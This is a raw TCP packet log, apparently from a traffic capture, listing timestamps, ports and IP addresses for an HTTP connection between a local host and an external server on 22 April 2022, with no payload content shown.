Apr 22, 2022 16:17:42.295195103 CEST	49842	80	192.168.2.6	193.56.146.148
Apr 22, 2022 16:17:42.295207024 CEST	80	49842	193.56.146.148	192.168.2.6
Apr 22, 2022 16:17:42.295223951 CEST	80	49842	193.56.146.148	192.168.2.6
Apr 22, 2022 16:17:42.295224905 CEST	49842	80	192.168.2.6	193.56.146.148
Apr 22, 2022 16:17:42.295242071 CEST	80	49842	193.56.146.148	192.168.2.6
Apr 22, 2022 16:17:42.295258999 CEST	80	49842	193.56.146.148	192.168.2.6
Apr 22, 2022 16:17:42.295277119 CEST	80	49842	193.56.146.148	192.168.2.6
Apr 22, 2022 16:17:42.295280933 CEST	49842	80	192.168.2.6	193.56.146.148
Apr 22, 2022 16:17:42.295295000 CEST	80	49842	193.56.146.148	192.168.2.6
Apr 22, 2022 16:17:42.295311928 CEST	80	49842	193.56.146.148	192.168.2.6
Apr 22, 2022 16:17:42.295329094 CEST	80	49842	193.56.146.148	192.168.2.6
Apr 22, 2022 16:17:42.295339108 CEST	49842	80	192.168.2.6	193.56.146.148
Apr 22, 2022 16:17:42.295346022 CEST	80	49842	193.56.146.148	192.168.2.6
Apr 22, 2022 16:17:42.295362949 CEST	80	49842	193.56.146.148	192.168.2.6
Apr 22, 2022 16:17:42.295378923 CEST	49842	80	192.168.2.6	193.56.146.148
Apr 22, 2022 16:17:42.295380116 CEST	80	49842	193.56.146.148	192.168.2.6
Apr 22, 2022 16:17:42.295397997 CEST	80	49842	193.56.146.148	192.168.2.6
Apr 22, 2022 16:17:42.295413971 CEST	80	49842	193.56.146.148	192.168.2.6
Apr 22, 2022 16:17:42.295413971 CEST	49842	80	192.168.2.6	193.56.146.148
Apr 22, 2022 16:17:42.295433044 CEST	80	49842	193.56.146.148	192.168.2.6
Apr 22, 2022 16:17:42.295444012 CEST	49842	80	192.168.2.6	193.56.146.148
Apr 22, 2022 16:17:42.295449018 CEST	80	49842	193.56.146.148	192.168.2.6
Apr 22, 2022 16:17:42.295466900 CEST	80	49842	193.56.146.148	192.168.2.6
Apr 22, 2022 16:17:42.295485020 CEST	80	49842	193.56.146.148	192.168.2.6
Apr 22, 2022 16:17:42.295485020 CEST	49842	80	192.168.2.6	193.56.146.148
Apr 22, 2022 16:17:42.295501947 CEST	80	49842	193.56.146.148	192.168.2.6
Apr 22, 2022 16:17:42.295515060 CEST	49842	80	192.168.2.6	193.56.146.148
Apr 22, 2022 16:17:42.295519114 CEST	80	49842	193.56.146.148	192.168.2.6
Apr 22, 2022 16:17:42.295535088 CEST	80	49842	193.56.146.148	192.168.2.6
Apr 22, 2022 16:17:42.295546055 CEST	49842	80	192.168.2.6	193.56.146.148
Apr 22, 2022 16:17:42.295552969 CEST	80	49842	193.56.146.148	192.168.2.6
Apr 22, 2022 16:17:42.295572996 CEST	80	49842	193.56.146.148	192.168.2.6
Apr 22, 2022 16:17:42.295577049 CEST	49842	80	192.168.2.6	193.56.146.148
Apr 22, 2022 16:17:42.295589924 CEST	80	49842	193.56.146.148	192.168.2.6
Apr 22, 2022 16:17:42.295604944 CEST	49842	80	192.168.2.6	193.56.146.148
Apr 22, 2022 16:17:42.295607090 CEST	80	49842	193.56.146.148	192.168.2.6
Apr 22, 2022 16:17:42.295624971 CEST	80	49842	193.56.146.148	192.168.2.6
Apr 22, 2022 16:17:42.295640945 CEST	80	49842	193.56.146.148	192.168.2.6
Apr 22, 2022 16:17:42.295660973 CEST	49842	80	192.168.2.6	193.56.146.148
Apr 22, 2022 16:17:42.295706034 CEST	49842	80	192.168.2.6	193.56.146.148
Apr 22, 2022 16:17:42.365828037 CEST	80	49842	193.56.146.148	192.168.2.6
Apr 22, 2022 16:17:42.365859032 CEST	80	49842	193.56.146.148	192.168.2.6
Apr 22, 2022 16:17:42.365875959 CEST	80	49842	193.56.146.148	192.168.2.6
Apr 22, 2022 16:17:42.365894079 CEST	80	49842	193.56.146.148	192.168.2.6
Apr 22, 2022 16:17:42.365911007 CEST	80	49842	193.56.146.148	192.168.2.6
Apr 22, 2022 16:17:42.365925074 CEST	49842	80	192.168.2.6	193.56.146.148
Apr 22, 2022 16:17:42.365927935 CEST	80	49842	193.56.146.148	192.168.2.6
Apr 22, 2022 16:17:42.365946054 CEST	80	49842	193.56.146.148	192.168.2.6
Apr 22, 2022 16:17:42.365953922 CEST	49842	80	192.168.2.6	193.56.146.148
Apr 22, 2022 16:17:42.365962029 CEST	80	49842	193.56.146.148	192.168.2.6
Apr 22, 2022 16:17:42.365981102 CEST	80	49842	193.56.146.148	192.168.2.6
Apr 22, 2022 16:17:42.365986109 CEST	49842	80	192.168.2.6	193.56.146.148
Apr 22, 2022 16:17:42.365998983 CEST	80	49842	193.56.146.148	192.168.2.6
Apr 22, 2022 16:17:42.366010904 CEST	49842	80	192.168.2.6	193.56.146.148
Apr 22, 2022 16:17:42.366015911 CEST	80	49842	193.56.146.148	192.168.2.6
Apr 22, 2022 16:17:42.366034985 CEST	80	49842	193.56.146.148	192.168.2.6
Apr 22, 2022 16:17:42.366053104 CEST	80	49842	193.56.146.148	192.168.2.6
Apr 22, 2022 16:17:42.366056919 CEST	49842	80	192.168.2.6	193.56.146.148
Apr 22, 2022 16:17:42.366070986 CEST	80	49842	193.56.146.148	192.168.2.6
Apr 22, 2022 16:17:42.366089106 CEST	80	49842	193.56.146.148	192.168.2.6
Apr 22, 2022 16:17:42.366102934 CEST	49842	80	192.168.2.6	193.56.146.148
Apr 22, 2022 16:17:42.366105080 CEST	80	49842	193.56.146.148	192.168.2.6
Apr 22, 2022 16:17:42.366123915 CEST	80	49842	193.56.146.148	192.168.2.6
Apr 22, 2022 16:17:42.366136074 CEST	49842	80	192.168.2.6	193.56.146.148
Apr 22, 2022 16:17:42.366142035 CEST	80	49842	193.56.146.148	192.168.2.6
Apr 22, 2022 16:17:42.366158962 CEST	80	49842	193.56.146.148	192.168.2.6
Apr 22, 2022 16:17:42.366183996 CEST	49842	80	192.168.2.6	193.56.146.148
Apr 22, 2022 16:17:42.366194963 CEST	80	49842	193.56.146.148	192.168.2.6
Apr 22, 2022 16:17:42.366213083 CEST	80	49842	193.56.146.148	192.168.2.6
Apr 22, 2022 16:17:42.366220951 CEST	49842	80	192.168.2.6	193.56.146.148
Apr 22, 2022 16:17:42.366230011 CEST	80	49842	193.56.146.148	192.168.2.6
Apr 22, 2022 16:17:42.366246939 CEST	80	49842	193.56.146.148	192.168.2.6
Apr 22, 2022 16:17:42.366264105 CEST	80	49842	193.56.146.148	192.168.2.6
Apr 22, 2022 16:17:42.366272926 CEST	49842	80	192.168.2.6	193.56.146.148
Apr 22, 2022 16:17:42.366281033 CEST	80	49842	193.56.146.148	192.168.2.6
Apr 22, 2022 16:17:42.366298914 CEST	80	49842	193.56.146.148	192.168.2.6
Apr 22, 2022 16:17:42.366307974 CEST	49842	80	192.168.2.6	193.56.146.148
Apr 22, 2022 16:17:42.366316080 CEST	80	49842	193.56.146.148	192.168.2.6
Apr 22, 2022 16:17:42.366333961 CEST	80	49842	193.56.146.148	192.168.2.6
Apr 22, 2022 16:17:42.366343021 CEST	49842	80	192.168.2.6	193.56.146.148
Apr 22, 2022 16:17:42.366350889 CEST	80	49842	193.56.146.148	192.168.2.6
Apr 22, 2022 16:17:42.366364956 CEST	49842	80	192.168.2.6	193.56.146.148
Apr 22, 2022 16:17:42.366369009 CEST	80	49842	193.56.146.148	192.168.2.6
Apr 22, 2022 16:17:42.366385937 CEST	80	49842	193.56.146.148	192.168.2.6
Apr 22, 2022 16:17:42.366401911 CEST	80	49842	193.56.146.148	192.168.2.6
Apr 22, 2022 16:17:42.366416931 CEST	49842	80	192.168.2.6	193.56.146.148
Apr 22, 2022 16:17:42.366425991 CEST	80	49842	193.56.146.148	192.168.2.6
Apr 22, 2022 16:17:42.366442919 CEST	80	49842	193.56.146.148	192.168.2.6
Apr 22, 2022 16:17:42.366460085 CEST	80	49842	193.56.146.148	192.168.2.6
Apr 22, 2022 16:17:42.366468906 CEST	49842	80	192.168.2.6	193.56.146.148
Apr 22, 2022 16:17:42.366477966 CEST	80	49842	193.56.146.148	192.168.2.6
Apr 22, 2022 16:17:42.366497040 CEST	80	49842	193.56.146.148	192.168.2.6
Apr 22, 2022 16:17:42.366513014 CEST	80	49842	193.56.146.148	192.168.2.6
Apr 22, 2022 16:17:42.366514921 CEST	49842	80	192.168.2.6	193.56.146.148
Apr 22, 2022 16:17:42.366530895 CEST	80	49842	193.56.146.148	192.168.2.6
Apr 22, 2022 16:17:42.366545916 CEST	49842	80	192.168.2.6	193.56.146.148
Apr 22, 2022 16:17:42.366548061 CEST	80	49842	193.56.146.148	192.168.2.6
Apr 22, 2022 16:17:42.366565943 CEST	80	49842	193.56.146.148	192.168.2.6
Apr 22, 2022 16:17:42.366580963 CEST	49842	80	192.168.2.6	193.56.146.148
Apr 22, 2022 16:17:42.366583109 CEST	80	49842	193.56.146.148	192.168.2.6
Apr 22, 2022 16:17:42.366600990 CEST	80	49842	193.56.146.148	192.168.2.6
Apr 22, 2022 16:17:42.366614103 CEST	49842	80	192.168.2.6	193.56.146.148
Apr 22, 2022 16:17:42.366617918 CEST	80	49842	193.56.146.148	192.168.2.6
Apr 22, 2022 16:17:42.366636038 CEST	80	49842	193.56.146.148	192.168.2.6
Apr 22, 2022 16:17:42.366651058 CEST	49842	80	192.168.2.6	193.56.146.148
Apr 22, 2022 16:17:42.366652012 CEST	80	49842	193.56.146.148	192.168.2.6
Apr 22, 2022 16:17:42.366667032 CEST	80	49842	193.56.146.148	192.168.2.6
Apr 22, 2022 16:17:42.366683960 CEST	49842	80	192.168.2.6	193.56.146.148
Apr 22, 2022 16:17:42.366684914 CEST	80	49842	193.56.146.148	192.168.2.6
Apr 22, 2022 16:17:42.366703033 CEST	80	49842	193.56.146.148	192.168.2.6
Apr 22, 2022 16:17:42.366717100 CEST	49842	80	192.168.2.6	193.56.146.148
Apr 22, 2022 16:17:42.366719961 CEST	80	49842	193.56.146.148	192.168.2.6
Apr 22, 2022 16:17:42.366736889 CEST	80	49842	193.56.146.148	192.168.2.6
Apr 22, 2022 16:17:42.366753101 CEST	49842	80	192.168.2.6	193.56.146.148
Apr 22, 2022 16:17:42.366755009 CEST	80	49842	193.56.146.148	192.168.2.6
Apr 22, 2022 16:17:42.366772890 CEST	80	49842	193.56.146.148	192.168.2.6
Apr 22, 2022 16:17:42.366784096 CEST	49842	80	192.168.2.6	193.56.146.148
Apr 22, 2022 16:17:42.366790056 CEST	80	49842	193.56.146.148	192.168.2.6
Apr 22, 2022 16:17:42.366806984 CEST	80	49842	193.56.146.148	192.168.2.6
Apr 22, 2022 16:17:42.366813898 CEST	49842	80	192.168.2.6	193.56.146.148
Apr 22, 2022 16:17:42.366825104 CEST	80	49842	193.56.146.148	192.168.2.6
Apr 22, 2022 16:17:42.366841078 CEST	49842	80	192.168.2.6	193.56.146.148
Apr 22, 2022 16:17:42.366883993 CEST	49842	80	192.168.2.6	193.56.146.148
Apr 22, 2022 16:17:42.436939955 CEST	80	49842	193.56.146.148	192.168.2.6
Apr 22, 2022 16:17:42.437062979 CEST	49842	80	192.168.2.6	193.56.146.148
Apr 22, 2022 16:17:42.488375902 CEST	49842	80	192.168.2.6	193.56.146.148
Apr 22, 2022 16:17:42.558377028 CEST	80	49842	193.56.146.148	192.168.2.6
Apr 22, 2022 16:17:42.558615923 CEST	80	49842	193.56.146.148	192.168.2.6
Apr 22, 2022 16:17:42.558641911 CEST	80	49842	193.56.146.148	192.168.2.6
Apr 22, 2022 16:17:42.558715105 CEST	49842	80	192.168.2.6	193.56.146.148
Apr 22, 2022 16:17:42.558746099 CEST	80	49842	193.56.146.148	192.168.2.6
Apr 22, 2022 16:17:42.558772087 CEST	80	49842	193.56.146.148	192.168.2.6
Apr 22, 2022 16:17:42.558801889 CEST	80	49842	193.56.146.148	192.168.2.6
Apr 22, 2022 16:17:42.558830976 CEST	80	49842	193.56.146.148	192.168.2.6
Apr 22, 2022 16:17:42.558851004 CEST	49842	80	192.168.2.6	193.56.146.148
Apr 22, 2022 16:17:42.558855057 CEST	80	49842	193.56.146.148	192.168.2.6
Apr 22, 2022 16:17:42.558880091 CEST	80	49842	193.56.146.148	192.168.2.6
Apr 22, 2022 16:17:42.558890104 CEST	49842	80	192.168.2.6	193.56.146.148
Apr 22, 2022 16:17:42.558907986 CEST	80	49842	193.56.146.148	192.168.2.6
Apr 22, 2022 16:17:42.558916092 CEST	49842	80	192.168.2.6	193.56.146.148
Apr 22, 2022 16:17:42.558933020 CEST	80	49842	193.56.146.148	192.168.2.6
Apr 22, 2022 16:17:42.558959961 CEST	80	49842	193.56.146.148	192.168.2.6
Apr 22, 2022 16:17:42.558973074 CEST	49842	80	192.168.2.6	193.56.146.148
Apr 22, 2022 16:17:42.558984995 CEST	80	49842	193.56.146.148	192.168.2.6
Apr 22, 2022 16:17:42.559009075 CEST	80	49842	193.56.146.148	192.168.2.6
Apr 22, 2022 16:17:42.559012890 CEST	49842	80	192.168.2.6	193.56.146.148
Apr 22, 2022 16:17:42.559032917 CEST	80	49842	193.56.146.148	192.168.2.6
Apr 22, 2022 16:17:42.559058905 CEST	80	49842	193.56.146.148	192.168.2.6
Apr 22, 2022 16:17:42.559066057 CEST	49842	80	192.168.2.6	193.56.146.148
Apr 22, 2022 16:17:42.559084892 CEST	80	49842	193.56.146.148	192.168.2.6
Apr 22, 2022 16:17:42.559092045 CEST	49842	80	192.168.2.6	193.56.146.148
Apr 22, 2022 16:17:42.559111118 CEST	80	49842	193.56.146.148	192.168.2.6
Apr 22, 2022 16:17:42.559138060 CEST	80	49842	193.56.146.148	192.168.2.6
Apr 22, 2022 16:17:42.559138060 CEST	49842	80	192.168.2.6	193.56.146.148
Apr 22, 2022 16:17:42.559163094 CEST	80	49842	193.56.146.148	192.168.2.6
Apr 22, 2022 16:17:42.559179068 CEST	49842	80	192.168.2.6	193.56.146.148
Apr 22, 2022 16:17:42.559187889 CEST	80	49842	193.56.146.148	192.168.2.6
Apr 22, 2022 16:17:42.559206963 CEST	49842	80	192.168.2.6	193.56.146.148
Apr 22, 2022 16:17:42.559212923 CEST	80	49842	193.56.146.148	192.168.2.6
Apr 22, 2022 16:17:42.559237003 CEST	80	49842	193.56.146.148	192.168.2.6
Apr 22, 2022 16:17:42.559246063 CEST	49842	80	192.168.2.6	193.56.146.148
Apr 22, 2022 16:17:42.559262991 CEST	80	49842	193.56.146.148	192.168.2.6
Apr 22, 2022 16:17:42.559272051 CEST	49842	80	192.168.2.6	193.56.146.148
Apr 22, 2022 16:17:42.559288025 CEST	80	49842	193.56.146.148	192.168.2.6
Apr 22, 2022 16:17:42.559298038 CEST	49842	80	192.168.2.6	193.56.146.148
Apr 22, 2022 16:17:42.559314013 CEST	80	49842	193.56.146.148	192.168.2.6
Apr 22, 2022 16:17:42.559323072 CEST	49842	80	192.168.2.6	193.56.146.148
Apr 22, 2022 16:17:42.559340000 CEST	80	49842	193.56.146.148	192.168.2.6
Apr 22, 2022 16:17:42.559350014 CEST	49842	80	192.168.2.6	193.56.146.148
Apr 22, 2022 16:17:42.559365988 CEST	80	49842	193.56.146.148	192.168.2.6
Apr 22, 2022 16:17:42.559375048 CEST	49842	80	192.168.2.6	193.56.146.148
Apr 22, 2022 16:17:42.559393883 CEST	80	49842	193.56.146.148	192.168.2.6
Apr 22, 2022 16:17:42.559401989 CEST	49842	80	192.168.2.6	193.56.146.148
Apr 22, 2022 16:17:42.559418917 CEST	80	49842	193.56.146.148	192.168.2.6
Apr 22, 2022 16:17:42.559431076 CEST	49842	80	192.168.2.6	193.56.146.148
Apr 22, 2022 16:17:42.559444904 CEST	80	49842	193.56.146.148	192.168.2.6
Apr 22, 2022 16:17:42.559458017 CEST	49842	80	192.168.2.6	193.56.146.148
Apr 22, 2022 16:17:42.559469938 CEST	80	49842	193.56.146.148	192.168.2.6
Apr 22, 2022 16:17:42.559488058 CEST	49842	80	192.168.2.6	193.56.146.148
Apr 22, 2022 16:17:42.559494019 CEST	80	49842	193.56.146.148	192.168.2.6
Apr 22, 2022 16:17:42.559520960 CEST	80	49842	193.56.146.148	192.168.2.6
Apr 22, 2022 16:17:42.559539080 CEST	49842	80	192.168.2.6	193.56.146.148
Apr 22, 2022 16:17:42.559545040 CEST	80	49842	193.56.146.148	192.168.2.6
Apr 22, 2022 16:17:42.559567928 CEST	49842	80	192.168.2.6	193.56.146.148
Apr 22, 2022 16:17:42.559571028 CEST	80	49842	193.56.146.148	192.168.2.6
Apr 22, 2022 16:17:42.559596062 CEST	80	49842	193.56.146.148	192.168.2.6
Apr 22, 2022 16:17:42.559604883 CEST	49842	80	192.168.2.6	193.56.146.148
Apr 22, 2022 16:17:42.559618950 CEST	80	49842	193.56.146.148	192.168.2.6
Apr 22, 2022 16:17:42.559634924 CEST	49842	80	192.168.2.6	193.56.146.148
Apr 22, 2022 16:17:42.559642076 CEST	80	49842	193.56.146.148	192.168.2.6
Apr 22, 2022 16:17:42.559667110 CEST	80	49842	193.56.146.148	192.168.2.6
Apr 22, 2022 16:17:42.559676886 CEST	49842	80	192.168.2.6	193.56.146.148
Apr 22, 2022 16:17:42.559690952 CEST	80	49842	193.56.146.148	192.168.2.6
Apr 22, 2022 16:17:42.559716940 CEST	49842	80	192.168.2.6	193.56.146.148
Apr 22, 2022 16:17:42.559717894 CEST	80	49842	193.56.146.148	192.168.2.6
Apr 22, 2022 16:17:42.559742928 CEST	80	49842	193.56.146.148	192.168.2.6
Apr 22, 2022 16:17:42.559755087 CEST	49842	80	192.168.2.6	193.56.146.148
Apr 22, 2022 16:17:42.559768915 CEST	80	49842	193.56.146.148	192.168.2.6
Apr 22, 2022 16:17:42.559793949 CEST	80	49842	193.56.146.148	192.168.2.6
Apr 22, 2022 16:17:42.559797049 CEST	49842	80	192.168.2.6	193.56.146.148
Apr 22, 2022 16:17:42.559818029 CEST	80	49842	193.56.146.148	192.168.2.6
Apr 22, 2022 16:17:42.559840918 CEST	49842	80	192.168.2.6	193.56.146.148
Apr 22, 2022 16:17:42.559844017 CEST	80	49842	193.56.146.148	192.168.2.6
Apr 22, 2022 16:17:42.559868097 CEST	49842	80	192.168.2.6	193.56.146.148
Apr 22, 2022 16:17:42.559870958 CEST	80	49842	193.56.146.148	192.168.2.6
Apr 22, 2022 16:17:42.559895992 CEST	80	49842	193.56.146.148	192.168.2.6
Apr 22, 2022 16:17:42.559901953 CEST	49842	80	192.168.2.6	193.56.146.148
Apr 22, 2022 16:17:42.559921980 CEST	80	49842	193.56.146.148	192.168.2.6
Apr 22, 2022 16:17:42.559933901 CEST	49842	80	192.168.2.6	193.56.146.148
Apr 22, 2022 16:17:42.559946060 CEST	80	49842	193.56.146.148	192.168.2.6
Apr 22, 2022 16:17:42.559961081 CEST	49842	80	192.168.2.6	193.56.146.148
Apr 22, 2022 16:17:42.559972048 CEST	80	49842	193.56.146.148	192.168.2.6
Apr 22, 2022 16:17:42.559998035 CEST	80	49842	193.56.146.148	192.168.2.6
Apr 22, 2022 16:17:42.560004950 CEST	49842	80	192.168.2.6	193.56.146.148
Apr 22, 2022 16:17:42.560023069 CEST	80	49842	193.56.146.148	192.168.2.6
Apr 22, 2022 16:17:42.560045958 CEST	49842	80	192.168.2.6	193.56.146.148
Apr 22, 2022 16:17:42.560048103 CEST	80	49842	193.56.146.148	192.168.2.6
Apr 22, 2022 16:17:42.560075045 CEST	80	49842	193.56.146.148	192.168.2.6
Apr 22, 2022 16:17:42.560082912 CEST	49842	80	192.168.2.6	193.56.146.148
Apr 22, 2022 16:17:42.560101986 CEST	80	49842	193.56.146.148	192.168.2.6
Apr 22, 2022 16:17:42.560126066 CEST	49842	80	192.168.2.6	193.56.146.148
Apr 22, 2022 16:17:42.560127974 CEST	80	49842	193.56.146.148	192.168.2.6
Apr 22, 2022 16:17:42.560152054 CEST	80	49842	193.56.146.148	192.168.2.6
Apr 22, 2022 16:17:42.560161114 CEST	49842	80	192.168.2.6	193.56.146.148
Apr 22, 2022 16:17:42.560178041 CEST	80	49842	193.56.146.148	192.168.2.6
Apr 22, 2022 16:17:42.560203075 CEST	80	49842	193.56.146.148	192.168.2.6
Apr 22, 2022 16:17:42.560205936 CEST	49842	80	192.168.2.6	193.56.146.148
Apr 22, 2022 16:17:42.560226917 CEST	80	49842	193.56.146.148	192.168.2.6
Apr 22, 2022 16:17:42.560251951 CEST	49842	80	192.168.2.6	193.56.146.148
Apr 22, 2022 16:17:42.560252905 CEST	80	49842	193.56.146.148	192.168.2.6
Apr 22, 2022 16:17:42.560277939 CEST	80	49842	193.56.146.148	192.168.2.6
Apr 22, 2022 16:17:42.560280085 CEST	49842	80	192.168.2.6	193.56.146.148
Apr 22, 2022 16:17:42.560305119 CEST	80	49842	193.56.146.148	192.168.2.6
Apr 22, 2022 16:17:42.560318947 CEST	49842	80	192.168.2.6	193.56.146.148
Apr 22, 2022 16:17:42.560331106 CEST	80	49842	193.56.146.148	192.168.2.6
Apr 22, 2022 16:17:42.560355902 CEST	80	49842	193.56.146.148	192.168.2.6
Apr 22, 2022 16:17:42.560363054 CEST	49842	80	192.168.2.6	193.56.146.148
Apr 22, 2022 16:17:42.560381889 CEST	80	49842	193.56.146.148	192.168.2.6
Apr 22, 2022 16:17:42.560404062 CEST	49842	80	192.168.2.6	193.56.146.148
Apr 22, 2022 16:17:42.560406923 CEST	80	49842	193.56.146.148	192.168.2.6
Apr 22, 2022 16:17:42.560441017 CEST	80	49842	193.56.146.148	192.168.2.6
Apr 22, 2022 16:17:42.560446024 CEST	49842	80	192.168.2.6	193.56.146.148
Apr 22, 2022 16:17:42.560465097 CEST	80	49842	193.56.146.148	192.168.2.6
Apr 22, 2022 16:17:42.560486078 CEST	49842	80	192.168.2.6	193.56.146.148
Apr 22, 2022 16:17:42.560488939 CEST	80	49842	193.56.146.148	192.168.2.6
Apr 22, 2022 16:17:42.560516119 CEST	80	49842	193.56.146.148	192.168.2.6
Apr 22, 2022 16:17:42.560522079 CEST	49842	80	192.168.2.6	193.56.146.148
Apr 22, 2022 16:17:42.560540915 CEST	80	49842	193.56.146.148	192.168.2.6
Apr 22, 2022 16:17:42.560564041 CEST	80	49842	193.56.146.148	192.168.2.6
Apr 22, 2022 16:17:42.560568094 CEST	49842	80	192.168.2.6	193.56.146.148
Apr 22, 2022 16:17:42.560586929 CEST	80	49842	193.56.146.148	192.168.2.6
Apr 22, 2022 16:17:42.560609102 CEST	49842	80	192.168.2.6	193.56.146.148
Apr 22, 2022 16:17:42.560614109 CEST	80	49842	193.56.146.148	192.168.2.6
Apr 22, 2022 16:17:42.560636997 CEST	80	49842	193.56.146.148	192.168.2.6
Apr 22, 2022 16:17:42.560636997 CEST	49842	80	192.168.2.6	193.56.146.148
Apr 22, 2022 16:17:42.560672998 CEST	49842	80	192.168.2.6	193.56.146.148
Apr 22, 2022 16:17:42.560676098 CEST	80	49842	193.56.146.148	192.168.2.6
Apr 22, 2022 16:17:42.560710907 CEST	80	49842	193.56.146.148	192.168.2.6
Apr 22, 2022 16:17:42.560745001 CEST	80	49842	193.56.146.148	192.168.2.6
Apr 22, 2022 16:17:42.560761929 CEST	80	49842	193.56.146.148	192.168.2.6
Apr 22, 2022 16:17:42.560781956 CEST	80	49842	193.56.146.148	192.168.2.6
Apr 22, 2022 16:17:42.560796022 CEST	49842	80	192.168.2.6	193.56.146.148
Apr 22, 2022 16:17:42.560807943 CEST	80	49842	193.56.146.148	192.168.2.6
Apr 22, 2022 16:17:42.560832024 CEST	80	49842	193.56.146.148	192.168.2.6
Apr 22, 2022 16:17:42.560843945 CEST	49842	80	192.168.2.6	193.56.146.148
Apr 22, 2022 16:17:42.560858011 CEST	80	49842	193.56.146.148	192.168.2.6
Apr 22, 2022 16:17:42.560873032 CEST	49842	80	192.168.2.6	193.56.146.148
Apr 22, 2022 16:17:42.560883045 CEST	80	49842	193.56.146.148	192.168.2.6
Apr 22, 2022 16:17:42.560900927 CEST	49842	80	192.168.2.6	193.56.146.148
Apr 22, 2022 16:17:42.560908079 CEST	80	49842	193.56.146.148	192.168.2.6
Apr 22, 2022 16:17:42.560934067 CEST	80	49842	193.56.146.148	192.168.2.6
Apr 22, 2022 16:17:42.560940981 CEST	49842	80	192.168.2.6	193.56.146.148
Apr 22, 2022 16:17:42.560959101 CEST	80	49842	193.56.146.148	192.168.2.6
Apr 22, 2022 16:17:42.560966015 CEST	49842	80	192.168.2.6	193.56.146.148
Apr 22, 2022 16:17:42.560983896 CEST	80	49842	193.56.146.148	192.168.2.6
Apr 22, 2022 16:17:42.560991049 CEST	49842	80	192.168.2.6	193.56.146.148
Apr 22, 2022 16:17:42.561011076 CEST	80	49842	193.56.146.148	192.168.2.6
Apr 22, 2022 16:17:42.561021090 CEST	49842	80	192.168.2.6	193.56.146.148
Apr 22, 2022 16:17:42.561034918 CEST	80	49842	193.56.146.148	192.168.2.6
Apr 22, 2022 16:17:42.561047077 CEST	49842	80	192.168.2.6	193.56.146.148
Apr 22, 2022 16:17:42.561059952 CEST	80	49842	193.56.146.148	192.168.2.6
Apr 22, 2022 16:17:42.561074972 CEST	49842	80	192.168.2.6	193.56.146.148
Apr 22, 2022 16:17:42.561083078 CEST	80	49842	193.56.146.148	192.168.2.6
Apr 22, 2022 16:17:42.561105967 CEST	80	49842	193.56.146.148	192.168.2.6
Apr 22, 2022 16:17:42.561114073 CEST	49842	80	192.168.2.6	193.56.146.148
Apr 22, 2022 16:17:42.561129093 CEST	80	49842	193.56.146.148	192.168.2.6
Apr 22, 2022 16:17:42.561153889 CEST	80	49842	193.56.146.148	192.168.2.6
Apr 22, 2022 16:17:42.561156988 CEST	49842	80	192.168.2.6	193.56.146.148
Apr 22, 2022 16:17:42.561178923 CEST	80	49842	193.56.146.148	192.168.2.6
Apr 22, 2022 16:17:42.561199903 CEST	49842	80	192.168.2.6	193.56.146.148
Apr 22, 2022 16:17:42.561203003 CEST	80	49842	193.56.146.148	192.168.2.6
Apr 22, 2022 16:17:42.561229944 CEST	80	49842	193.56.146.148	192.168.2.6
Apr 22, 2022 16:17:42.561232090 CEST	49842	80	192.168.2.6	193.56.146.148
Apr 22, 2022 16:17:42.561254025 CEST	80	49842	193.56.146.148	192.168.2.6
Apr 22, 2022 16:17:42.561274052 CEST	49842	80	192.168.2.6	193.56.146.148
Apr 22, 2022 16:17:42.561292887 CEST	80	49842	193.56.146.148	192.168.2.6
Apr 22, 2022 16:17:42.561314106 CEST	49842	80	192.168.2.6	193.56.146.148
Apr 22, 2022 16:17:42.561317921 CEST	80	49842	193.56.146.148	192.168.2.6
Apr 22, 2022 16:17:42.561342001 CEST	80	49842	193.56.146.148	192.168.2.6
Apr 22, 2022 16:17:42.561352015 CEST	49842	80	192.168.2.6	193.56.146.148
Apr 22, 2022 16:17:42.561363935 CEST	80	49842	193.56.146.148	192.168.2.6
Apr 22, 2022 16:17:42.561383963 CEST	49842	80	192.168.2.6	193.56.146.148
Apr 22, 2022 16:17:42.561387062 CEST	80	49842	193.56.146.148	192.168.2.6
Apr 22, 2022 16:17:42.561409950 CEST	80	49842	193.56.146.148	192.168.2.6
Apr 22, 2022 16:17:42.561422110 CEST	49842	80	192.168.2.6	193.56.146.148
Apr 22, 2022 16:17:42.561433077 CEST	80	49842	193.56.146.148	192.168.2.6
Apr 22, 2022 16:17:42.561456919 CEST	80	49842	193.56.146.148	192.168.2.6
Apr 22, 2022 16:17:42.561464071 CEST	49842	80	192.168.2.6	193.56.146.148
Apr 22, 2022 16:17:42.561480999 CEST	80	49842	193.56.146.148	192.168.2.6
Apr 22, 2022 16:17:42.561505079 CEST	80	49842	193.56.146.148	192.168.2.6
Apr 22, 2022 16:17:42.561506033 CEST	49842	80	192.168.2.6	193.56.146.148
Apr 22, 2022 16:17:42.561531067 CEST	80	49842	193.56.146.148	192.168.2.6
Apr 22, 2022 16:17:42.561537981 CEST	49842	80	192.168.2.6	193.56.146.148
Apr 22, 2022 16:17:42.561553955 CEST	80	49842	193.56.146.148	192.168.2.6
Apr 22, 2022 16:17:42.561573982 CEST	80	49842	193.56.146.148	192.168.2.6
Apr 22, 2022 16:17:42.561578989 CEST	49842	80	192.168.2.6	193.56.146.148
Apr 22, 2022 16:17:42.561597109 CEST	80	49842	193.56.146.148	192.168.2.6
Apr 22, 2022 16:17:42.561603069 CEST	49842	80	192.168.2.6	193.56.146.148
Apr 22, 2022 16:17:42.561619997 CEST	80	49842	193.56.146.148	192.168.2.6
Apr 22, 2022 16:17:42.561641932 CEST	80	49842	193.56.146.148	192.168.2.6
Apr 22, 2022 16:17:42.561649084 CEST	49842	80	192.168.2.6	193.56.146.148
Apr 22, 2022 16:17:42.561665058 CEST	80	49842	193.56.146.148	192.168.2.6
Apr 22, 2022 16:17:42.561678886 CEST	49842	80	192.168.2.6	193.56.146.148
Apr 22, 2022 16:17:42.561687946 CEST	80	49842	193.56.146.148	192.168.2.6
Apr 22, 2022 16:17:42.561709881 CEST	80	49842	193.56.146.148	192.168.2.6
Apr 22, 2022 16:17:42.561718941 CEST	49842	80	192.168.2.6	193.56.146.148
Apr 22, 2022 16:17:42.561733007 CEST	80	49842	193.56.146.148	192.168.2.6
Apr 22, 2022 16:17:42.561755896 CEST	80	49842	193.56.146.148	192.168.2.6
Apr 22, 2022 16:17:42.561759949 CEST	49842	80	192.168.2.6	193.56.146.148
Apr 22, 2022 16:17:42.561779022 CEST	80	49842	193.56.146.148	192.168.2.6
Apr 22, 2022 16:17:42.561788082 CEST	49842	80	192.168.2.6	193.56.146.148
Apr 22, 2022 16:17:42.561801910 CEST	80	49842	193.56.146.148	192.168.2.6
Apr 22, 2022 16:17:42.561825991 CEST	80	49842	193.56.146.148	192.168.2.6
